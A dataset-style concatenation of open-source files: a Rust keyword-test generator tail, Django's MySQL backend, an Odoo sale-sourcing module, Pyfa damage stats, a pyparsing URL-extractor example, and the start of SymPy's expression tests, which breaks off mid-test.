for kw in sys.argv[1:]:
test_file = os.path.join(test_dir, 'keyword-%s-as-identifier.rs' % kw)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(template % (datetime.datetime.now().year, kw, kw))
# mark file read-only
os.chmod(test_file, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
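# Editorial note (sketch): invoking `src/etc/generate-keyword-tests.py as break`
# would (re)write read-only files such as
# src/test/compile-fail/keyword-as-as-identifier.rs and
# src/test/compile-fail/keyword-break-as-identifier.rs from the template above.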
| apache-2.0 | 5,708,426,297,778,499,000 | 32.644068 | 76 | 0.711839 | false |
hungtt57/matchmaker | lib/python2.7/site-packages/django/db/backends/mysql/base.py | 103 | 15969 | """
MySQL database backend for Django.
Requires mysqlclient: https://pypi.python.org/pypi/mysqlclient/
MySQLdb is supported for Python 2 only: http://sourceforge.net/projects/mysql-python
"""
from __future__ import unicode_literals
import datetime
import re
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.utils import six, timezone
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes, SafeText
try:
import MySQLdb as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading MySQLdb module: %s" % e)
from MySQLdb.constants import CLIENT, FIELD_TYPE # isort:skip
from MySQLdb.converters import Thing2Literal, conversions # isort:skip
# Some of these import MySQLdb, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .validation import DatabaseValidation # isort:skip
# We want version (1, 2, 1, 'final', 2) or later. We can't just use
# lexicographic ordering in this check because then (1, 2, 1, 'gamma')
# inadvertently passes the version test.
version = Database.version_info
if (version < (1, 2, 1) or (version[:3] == (1, 2, 1) and
(len(version) < 5 or version[3] != 'final' or version[4] < 2))):
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("MySQLdb-1.2.1p2 or newer is required; you have %s" % Database.__version__)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
# It's impossible to import datetime_or_None directly from MySQLdb.times
parse_datetime = conversions[FIELD_TYPE.DATETIME]
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
def adapt_datetime_with_timezone_support(value, conv):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("MySQL received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return Thing2Literal(value.strftime("%Y-%m-%d %H:%M:%S.%f"), conv)
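# Editorial sketch: the naive/aware round trip implemented by the two
# functions above, in plain datetime terms -- MySQL stores naive UTC wall
# times, and tzinfo is re-attached on the way out.
def _tz_roundtrip_demo():
    aware = datetime.datetime(2015, 6, 1, 12, 0, tzinfo=timezone.utc)
    stored = aware.astimezone(timezone.utc).replace(tzinfo=None)  # to MySQL
    loaded = stored.replace(tzinfo=timezone.utc)                  # from MySQL
    return loaded == aware   # True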
# MySQLdb-1.2.1 returns TIME columns as timedelta -- they are more like
# timedelta in terms of actual behavior as they are signed and include days --
# and Django expects time, so we still need to override that. We also need to
# add special handling for SafeText and SafeBytes as MySQLdb's type
# checking is too tight to catch those (see Django ticket #6052).
# Finally, MySQLdb always returns naive datetime objects. However, when
# timezone support is active, Django expects timezone-aware datetime objects.
django_conversions = conversions.copy()
django_conversions.update({
FIELD_TYPE.TIME: backend_utils.typecast_time,
FIELD_TYPE.DECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.NEWDECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.DATETIME: parse_datetime_with_timezone_support,
datetime.datetime: adapt_datetime_with_timezone_support,
})
# This should match the numerical portion of the version numbers (we can treat
# versions like 5.0.24 and 5.0.24a as the same). Based on the list of versions
# at http://dev.mysql.com/doc/refman/4.1/en/news.html and
# http://dev.mysql.com/doc/refman/5.0/en/news.html .
server_version_re = re.compile(r'(\d{1,2})\.(\d{1,2})\.(\d{1,2})')
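# Editorial sketch: how the regex above is applied (see mysql_version further
# down); the sample server string is hypothetical.
def _parse_server_version_demo(server_info='5.6.30-log'):
    match = server_version_re.match(server_info)
    return tuple(int(x) for x in match.groups())   # (5, 6, 30)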
# MySQLdb-1.2.1 and newer automatically makes use of SHOW WARNINGS on
# MySQL-4.1 and newer, so the MysqlDebugWrapper is unnecessary. Since the
# point is to raise Warnings as exceptions, this can be done with the Python
# warning module, and this is set up when the connection is created, and the
# standard backend_utils.CursorDebugWrapper can be used. Also, using sql_mode
# TRADITIONAL will automatically cause most warnings to be treated as errors.
class CursorWrapper(object):
"""
A thin wrapper around MySQLdb's normal cursor class so that we can catch
particular exception instances and reraise them with the right types.
Implemented as a wrapper, rather than a subclass, so that we aren't stuck
to the particular underlying representation returned by Connection.cursor().
"""
codes_for_integrityerror = (1048,)
def __init__(self, cursor):
self.cursor = cursor
def execute(self, query, args=None):
try:
# args is None means no string interpolation
return self.cursor.execute(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, args):
try:
return self.cursor.executemany(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return iter(self.cursor)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Ticket #17671 - Close instead of passing thru to avoid backend
# specific behavior.
self.close()
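# Editorial sketch: the exception remapping above, driven by a fake cursor.
# ``_FakeCursor`` is hypothetical; error code 1048 is one of
# CursorWrapper.codes_for_integrityerror.
def _cursor_wrapper_demo():
    class _FakeCursor(object):
        def execute(self, query, args=None):
            raise Database.OperationalError(1048, "Column 'x' cannot be null")

    wrapped = CursorWrapper(_FakeCursor())
    try:
        wrapped.execute("INSERT INTO t (x) VALUES (NULL)")
    except utils.IntegrityError:
        return True   # OperationalError 1048 was remapped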
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'mysql'
# This dictionary maps Field objects to their associated MySQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
_data_types = {
'AutoField': 'integer AUTO_INCREMENT',
'BinaryField': 'longblob',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'bigint',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'char(15)',
'GenericIPAddressField': 'char(39)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer UNSIGNED',
'PositiveSmallIntegerField': 'smallint UNSIGNED',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'longtext',
'TimeField': 'time',
'UUIDField': 'char(32)',
}
@cached_property
def data_types(self):
if self.features.supports_microsecond_precision:
return dict(self._data_types, DateTimeField='datetime(6)', TimeField='time(6)')
else:
return self._data_types
operators = {
'exact': '= %s',
'iexact': 'LIKE %s',
'contains': 'LIKE BINARY %s',
'icontains': 'LIKE %s',
'regex': 'REGEXP BINARY %s',
'iregex': 'REGEXP %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE BINARY %s',
'endswith': 'LIKE BINARY %s',
'istartswith': 'LIKE %s',
'iendswith': 'LIKE %s',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\%%'), '_', '\_')"
pattern_ops = {
'contains': "LIKE BINARY CONCAT('%%', {}, '%%')",
'icontains': "LIKE CONCAT('%%', {}, '%%')",
'startswith': "LIKE BINARY CONCAT({}, '%%')",
'istartswith': "LIKE CONCAT({}, '%%')",
'endswith': "LIKE BINARY CONCAT('%%', {})",
'iendswith': "LIKE CONCAT('%%', {})",
}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = DatabaseValidation(self)
def get_connection_params(self):
kwargs = {
'conv': django_conversions,
'charset': 'utf8',
}
if six.PY2:
kwargs['use_unicode'] = True
settings_dict = self.settings_dict
if settings_dict['USER']:
kwargs['user'] = settings_dict['USER']
if settings_dict['NAME']:
kwargs['db'] = settings_dict['NAME']
if settings_dict['PASSWORD']:
kwargs['passwd'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST'].startswith('/'):
kwargs['unix_socket'] = settings_dict['HOST']
elif settings_dict['HOST']:
kwargs['host'] = settings_dict['HOST']
if settings_dict['PORT']:
kwargs['port'] = int(settings_dict['PORT'])
# We need the number of potentially affected rows after an
# "UPDATE", not the number of changed rows.
kwargs['client_flag'] = CLIENT.FOUND_ROWS
kwargs.update(settings_dict['OPTIONS'])
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.encoders[SafeText] = conn.encoders[six.text_type]
conn.encoders[SafeBytes] = conn.encoders[bytes]
return conn
def init_connection_state(self):
with self.cursor() as cursor:
# SQL_AUTO_IS_NULL in MySQL controls whether an AUTO_INCREMENT column
            # on a recently-inserted row will be returned when the field is tested for
# NULL. Disabling this value brings this aspect of MySQL in line with
# SQL standards.
cursor.execute('SET SQL_AUTO_IS_NULL = 0')
def create_cursor(self):
cursor = self.connection.cursor()
return CursorWrapper(cursor)
def _rollback(self):
try:
BaseDatabaseWrapper._rollback(self)
except Database.NotSupportedError:
pass
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit(autocommit)
def disable_constraint_checking(self):
"""
Disables foreign key checks, primarily for use in adding rows with forward references. Always returns True,
to indicate constraint checks need to be re-enabled.
"""
self.cursor().execute('SET foreign_key_checks=0')
return True
def enable_constraint_checking(self):
"""
Re-enable foreign key checks after they have been disabled.
"""
# Override needs_rollback in case constraint_checks_disabled is
# nested inside transaction.atomic.
self.needs_rollback, needs_rollback = False, self.needs_rollback
try:
self.cursor().execute('SET foreign_key_checks=1')
finally:
self.needs_rollback = needs_rollback
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign
key references. This method is intended to be used in conjunction with
`disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint
checks were off.
Raises an IntegrityError on the first invalid foreign key reference
encountered (if any) and provides detailed information about the
invalid reference in the error message.
Backends can override this method if they can more directly apply
constraint checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0],
table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def mysql_version(self):
with self.temporary_connection():
server_info = self.connection.get_server_info()
match = server_version_re.match(server_info)
if not match:
raise Exception('Unable to determine MySQL version from version string %r' % server_info)
return tuple(int(x) for x in match.groups())
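# Editorial sketch: what pattern_esc/pattern_ops produce when the right-hand
# side of a LIKE-style lookup is an expression rather than a literal; the
# column reference used here is hypothetical.
def _pattern_lookup_demo(rhs_sql='"myapp_book"."title"'):
    escaped = DatabaseWrapper.pattern_esc.format(rhs_sql)
    return DatabaseWrapper.pattern_ops['contains'].format(escaped)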
| mit | -2,545,230,625,577,020,400 | 41.470745 | 117 | 0.637235 | false |
anas-taji/sale-workflow | sale_sourced_by_line/model/sale.py | 33 | 2963 | # -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier, Yannick Vaucher
# Copyright 2013-2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp import models, api, fields
from openerp.osv import orm
class SaleOrder(models.Model):
_inherit = 'sale.order'
def _prepare_order_line_procurement(self, cr, uid, order, line,
group_id=False, context=None):
values = super(SaleOrder, self)._prepare_order_line_procurement(
cr, uid, order, line, group_id=group_id, context=context)
if line.warehouse_id:
values['warehouse_id'] = line.warehouse_id.id
return values
@api.model
def _prepare_procurement_group_by_line(self, line):
vals = super(SaleOrder, self)._prepare_procurement_group_by_line(line)
# for compatibility with sale_quotation_sourcing
if line._get_procurement_group_key()[0] == 8:
if line.warehouse_id:
vals['name'] += '/' + line.warehouse_id.name
return vals
SO_STATES = {
'cancel': [('readonly', True)],
'progress': [('readonly', True)],
'manual': [('readonly', True)],
'shipping_except': [('readonly', True)],
'invoice_except': [('readonly', True)],
'done': [('readonly', True)],
}
warehouse_id = fields.Many2one(
'stock.warehouse',
'Default Warehouse',
states=SO_STATES,
help="If no source warehouse is selected on line, "
"this warehouse is used as default. ")
class SaleOrderLine(orm.Model):
_inherit = 'sale.order.line'
warehouse_id = fields.Many2one(
'stock.warehouse',
'Source Warehouse',
help="If a source warehouse is selected, "
"it will be used to define the route. "
"Otherwise, it will get the warehouse of "
"the sale order")
@api.multi
def _get_procurement_group_key(self):
""" Return a key with priority to be used to regroup lines in multiple
procurement groups
"""
priority = 8
key = super(SaleOrderLine, self)._get_procurement_group_key()
# Check priority
if key[0] >= priority:
return key
return (priority, self.warehouse_id.id)
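# Editorial sketch: the (priority, value) key scheme above in isolation -- a
# key contributed by another module with priority >= 8 wins over this
# warehouse-based grouping. The arguments here are hypothetical.
def _group_key_demo(super_key, warehouse_id, priority=8):
    if super_key[0] >= priority:
        return super_key
    return (priority, warehouse_id)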
| agpl-3.0 | -6,150,837,192,120,776,000 | 33.858824 | 78 | 0.617955 | false |
blitzmann/Pyfa | eos/utils/stats.py | 1 | 2381 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
class DmgTypes:
"""Container for damage data stats."""
def __init__(self, em, thermal, kinetic, explosive):
self.em = em
self.thermal = thermal
self.kinetic = kinetic
self.explosive = explosive
self._calcTotal()
# Iterator is needed to support tuple-style unpacking
def __iter__(self):
yield self.em
yield self.thermal
yield self.kinetic
yield self.explosive
yield self.total
def __eq__(self, other):
if not isinstance(other, DmgTypes):
return NotImplemented
return all((
self.em == other.em,
self.thermal == other.thermal,
self.kinetic == other.kinetic,
self.explosive == other.explosive,
self.total == other.total))
def __bool__(self):
return any((
self.em, self.thermal, self.kinetic,
self.explosive, self.total))
def _calcTotal(self):
self.total = self.em + self.thermal + self.kinetic + self.explosive
def __add__(self, other):
return type(self)(
em=self.em + other.em,
thermal=self.thermal + other.thermal,
kinetic=self.kinetic + other.kinetic,
explosive=self.explosive + other.explosive)
def __iadd__(self, other):
self.em += other.em
self.thermal += other.thermal
self.kinetic += other.kinetic
self.explosive += other.explosive
self._calcTotal()
return self
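# Editorial sketch: the tuple-style unpacking enabled by __iter__ above,
# combined with the addition operators.
def _dmg_types_demo():
    profile = DmgTypes(10, 20, 30, 40) + DmgTypes(1, 2, 3, 4)
    em, thermal, kinetic, explosive, total = profile
    return total   # 110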
| gpl-3.0 | 253,944,888,759,681,920 | 33.014286 | 81 | 0.582108 | false |
chrisdew/pyparsing-autocomplete | examples/urlExtractor.py | 16 | 1749 | # URL extractor
# Copyright 2004, Paul McGuire
from pyparsing import Literal,Suppress,CharsNotIn,CaselessLiteral,\
Word,dblQuotedString,alphanums,SkipTo
import urllib
import pprint
# Define the pyparsing grammar for a URL, that is:
# URLlink ::= <a href= URL>linkText</a>
# URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link. Note also
# that it is not necessary to explicitly show this in the pyparsing grammar; by default,
# pyparsing skips over whitespace between tokens.
linkOpenTag = (Literal("<") + "a" + "href" + "=").suppress() + \
( dblQuotedString | Word(alphanums+"/") ) + \
Suppress(">")
linkCloseTag = Literal("<") + "/" + CaselessLiteral("a") + ">"
link = linkOpenTag + SkipTo(linkCloseTag) + linkCloseTag.suppress()
# Go get some HTML with some links in it.
serverListPage = urllib.urlopen( "http://www.yahoo.com" )
htmlText = serverListPage.read()
serverListPage.close()
# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks,strt,end in link.scanString(htmlText):
print toks.asList()
# Rerun scanString, but this time create a dict of text:URL key-value pairs.
# Need to reverse the tokens returned by link, using a parse action.
link.setParseAction( lambda st,loc,toks: [ toks[1], toks[0] ] )
# Create dictionary from list comprehension, assembled from each pair of tokens returned
# from a matched URL.
pprint.pprint(
dict( [ toks for toks,strt,end in link.scanString(htmlText) ] )
)
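# Editorial sketch: the same grammar run against a fixed snippet, avoiding the
# live fetch above. After the parse action set earlier, each match yields a
# (link text, URL) pair.
def _offline_demo():
    sample = '<a href="http://example.com">Example</a>'
    return [toks.asList() for toks, start, end in link.scanString(sample)]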
| mit | 2,925,555,085,771,994,600 | 39.642857 | 89 | 0.697541 | false |
lidavidm/sympy | sympy/core/tests/test_expr.py | 3 | 54640 | from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
"""
Minimal implementation of a number that works with SymPy.
If one has a Number class (e.g. Sage Integer, or some other custom class)
that one wants to work well with SymPy, one has to implement at least the
    methods of this class DummyNumber, or of its subclasses I5 and F1_1.
Basically, one just needs to implement either __int__() or __float__() and
then one needs to make sure that the class works with Python integers and
with itself.
"""
def __radd__(self, a):
if isinstance(a, (int, float)):
return a + self.number
return NotImplemented
def __truediv__(a, b):
return a.__div__(b)
def __rtruediv__(a, b):
return a.__rdiv__(b)
def __add__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number + a
return NotImplemented
def __rsub__(self, a):
if isinstance(a, (int, float)):
return a - self.number
return NotImplemented
def __sub__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number - a
return NotImplemented
def __rmul__(self, a):
if isinstance(a, (int, float)):
return a * self.number
return NotImplemented
def __mul__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number * a
return NotImplemented
def __rdiv__(self, a):
if isinstance(a, (int, float)):
return a / self.number
return NotImplemented
def __div__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number / a
return NotImplemented
def __rpow__(self, a):
if isinstance(a, (int, float)):
return a ** self.number
return NotImplemented
def __pow__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number ** a
return NotImplemented
def __pos__(self):
return self.number
def __neg__(self):
return - self.number
class I5(DummyNumber):
number = 5
def __int__(self):
return self.number
class F1_1(DummyNumber):
number = 1.1
def __float__(self):
return self.number
i5 = I5()
f1_1 = F1_1()
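# Editorial sketch: the fallback paths exercised by the instances above --
# sympify() coerces unknown objects through __int__/__float__, so mixed
# arithmetic with Symbols works in either operand order.
def _dummy_number_demo():
    assert i5 + x == x + 5      # I5.__add__ defers; Symbol.__radd__ sympifies
    assert x*f1_1 == 1.1*x      # F1_1 is coerced via __float__
    return True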
# basic sympy objects
basic_objs = [
Rational(2),
Float("1.3"),
x,
y,
pow(x, y)*y,
]
# all supported objects
all_objs = basic_objs + [
5,
5.5,
i5,
f1_1
]
def dotest(s):
for x in all_objs:
for y in all_objs:
s(x, y)
return True
def test_basic():
def j(a, b):
x = a
x = +a
x = -a
x = a + b
x = a - b
x = a*b
x = a/b
x = a**b
assert dotest(j)
def test_ibasic():
def s(a, b):
x = a
x += b
x = a
x -= b
x = a
x *= b
x = a
x /= b
assert dotest(s)
def test_relational():
assert (pi < 3) is False
assert (pi <= 3) is False
assert (pi > 3) is True
assert (pi >= 3) is True
assert (-pi < 3) is True
assert (-pi <= 3) is True
assert (-pi > 3) is False
assert (-pi >= 3) is False
assert (x - 2 < x - 3) is False
def test_relational_assumptions():
from sympy import Lt, Gt, Le, Ge
m1 = Symbol("m1", nonnegative=False)
m2 = Symbol("m2", positive=False)
m3 = Symbol("m3", nonpositive=False)
m4 = Symbol("m4", negative=False)
assert (m1 < 0) == Lt(m1, 0)
assert (m2 <= 0) == Le(m2, 0)
assert (m3 > 0) == Gt(m3, 0)
assert (m4 >= 0) == Ge(m4, 0)
m1 = Symbol("m1", nonnegative=False, real=True)
m2 = Symbol("m2", positive=False, real=True)
m3 = Symbol("m3", nonpositive=False, real=True)
m4 = Symbol("m4", negative=False, real=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=True)
m2 = Symbol("m2", nonpositive=True)
m3 = Symbol("m3", positive=True)
m4 = Symbol("m4", nonnegative=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=False)
m2 = Symbol("m2", nonpositive=False)
m3 = Symbol("m3", positive=False)
m4 = Symbol("m4", nonnegative=False)
assert (m1 < 0) is False
assert (m2 <= 0) is False
assert (m3 > 0) is False
assert (m4 >= 0) is False
def test_relational_noncommutative():
from sympy import Lt, Gt, Le, Ge
A, B = symbols('A,B', commutative=False)
assert (A < B) == Lt(A, B)
assert (A <= B) == Le(A, B)
assert (A > B) == Gt(A, B)
assert (A >= B) == Ge(A, B)
def test_basic_nostr():
for obj in basic_objs:
raises(TypeError, lambda: obj + '1')
raises(TypeError, lambda: obj - '1')
if obj == 2:
assert obj * '1' == '11'
else:
raises(TypeError, lambda: obj * '1')
raises(TypeError, lambda: obj / '1')
raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
assert (1/x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
assert (1/x**2 + 1 + x + x**2).leadterm(x)[1] == -2
assert (1/x + 1 + x + x**2).leadterm(x)[1] == -1
assert (x**2 + 1/x).leadterm(x)[1] == -1
assert (1 + x**2).leadterm(x)[1] == 0
assert (x + 1).leadterm(x)[1] == 0
assert (x + x**2).leadterm(x)[1] == 1
assert (x**2).leadterm(x)[1] == 2
def test_as_leading_term():
assert (3 + 2*x**(log(3)/log(2) - 1)).as_leading_term(x) == 3
assert (1/x**2 + 1 + x + x**2).as_leading_term(x) == 1/x**2
assert (1/x + 1 + x + x**2).as_leading_term(x) == 1/x
assert (x**2 + 1/x).as_leading_term(x) == 1/x
assert (1 + x**2).as_leading_term(x) == 1
assert (x + 1).as_leading_term(x) == 1
assert (x + x**2).as_leading_term(x) == x
assert (x**2).as_leading_term(x) == x**2
assert (x + oo).as_leading_term(x) == oo
def test_leadterm2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
(sin(1 + sin(1)), 0)
def test_leadterm3():
assert (y + z + x).leadterm(x) == (y + z, 0)
def test_as_leading_term2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
sin(1 + sin(1))
def test_as_leading_term3():
assert (2 + pi + x).as_leading_term(x) == 2 + pi
assert (2*x + pi*x + x**2).as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
# see issue 3744
n = Symbol('n', integer=True, positive=True)
r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
1 + 1/(n*x + x) + 1/(n + 1) - 1/x
assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
class foo(Function):
pass
assert foo(1/x).as_leading_term(x) == foo(1/x)
assert foo(1).as_leading_term(x) == foo(1)
raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
assert x.atoms() == set([x])
assert (1 + x).atoms() == set([x, S(1)])
assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
assert Rational(1, 2).atoms() == set([S.Half])
assert Rational(1, 2).atoms(Symbol) == set([])
assert sin(oo).atoms(oo) == set([oo])
assert Poly(0, x).atoms() == set([S.Zero])
assert Poly(1, x).atoms() == set([S.One])
assert Poly(x, x).atoms() == set([x])
assert Poly(x, x, y).atoms() == set([x])
assert Poly(x + y, x, y).atoms() == set([x, y])
assert Poly(x + y, x, y, z).atoms() == set([x, y])
assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
assert (I*pi).atoms(NumberSymbol) == set([pi])
assert (I*pi).atoms(NumberSymbol, I) == \
(I*pi).atoms(I, NumberSymbol) == set([pi, I])
assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
# issue 3033
f = Function('f')
e = (f(x) + sin(x) + 2)
assert e.atoms(AppliedUndef) == \
set([f(x)])
assert e.atoms(AppliedUndef, Function) == \
set([f(x), sin(x)])
assert e.atoms(Function) == \
set([f(x), sin(x)])
assert e.atoms(AppliedUndef, Number) == \
set([f(x), S(2)])
assert e.atoms(Function, Number) == \
set([S(2), sin(x), f(x)])
def test_is_polynomial():
k = Symbol('k', nonnegative=True, integer=True)
assert Rational(2).is_polynomial(x, y, z) is True
assert (S.Pi).is_polynomial(x, y, z) is True
assert x.is_polynomial(x) is True
assert x.is_polynomial(y) is True
assert (x**2).is_polynomial(x) is True
assert (x**2).is_polynomial(y) is True
assert (x**(-2)).is_polynomial(x) is False
assert (x**(-2)).is_polynomial(y) is True
assert (2**x).is_polynomial(x) is False
assert (2**x).is_polynomial(y) is True
assert (x**k).is_polynomial(x) is False
